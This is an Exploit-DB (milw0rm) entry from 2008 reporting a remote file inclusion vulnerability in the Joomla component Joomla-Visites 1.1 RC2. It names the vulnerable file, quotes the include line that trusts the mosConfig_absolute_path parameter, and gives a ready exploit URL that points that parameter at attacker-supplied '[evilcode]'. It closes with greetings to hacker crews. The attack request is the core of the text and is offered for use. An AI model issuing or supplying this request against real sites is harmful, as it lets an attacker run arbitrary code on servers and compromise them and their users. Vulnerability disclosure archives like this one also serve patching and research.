Joomla! Component Joomla-Visites 1.1 RC2 - Remote File Inclusion

EDB-ID:

5497

CVE:

N/A

Author:

NoGe

Type:

webapps

Platform:

PHP

Published:

2008-04-25

/===============================================================================================================================================\
  |																		  |
  |  [o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability										  |
  |																		  |
  |       Software : com_joomla-visites version 1.1 RC2												  |
  |       Vendor   : http://www.joomla-visites.net/												  |
  |       Author   : NoGe															  |
  |       Contact  : noge[dot]code[at]gmail[dot]com												  |
  |																		  |
  |===============================================================================================================================================|
  |																		  |
  |  [o] Vulnerable file															  |
  |																		  |
  |       administrator/components/com_joomla-visites/core/include/myMailer.class.php								  |
  |																		  |
  |        require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php';							  |
  |																		  |
  |																		  |
  |																		  |
  |  [o] Exploit																  |
  |																		  |
  |       http://localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]  |
  |																		  |
  |===============================================================================================================================================|
  |																		  |
  |  [o] Greetz																	  |
  |																		  |
  |       all crew #papuahacker #nyubicrew #baliemhackerlink											  |
  |       skulmatic olibekas ulga Cungkee nyubi k1tk4t LoCK3R culun_borneo											  |
  |       yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ str0ke										  |
  |       http://kapukvalley.net member														  |
  |																		  |
  \===============================================================================================================================================/

# milw0rm.com [2008-04-25]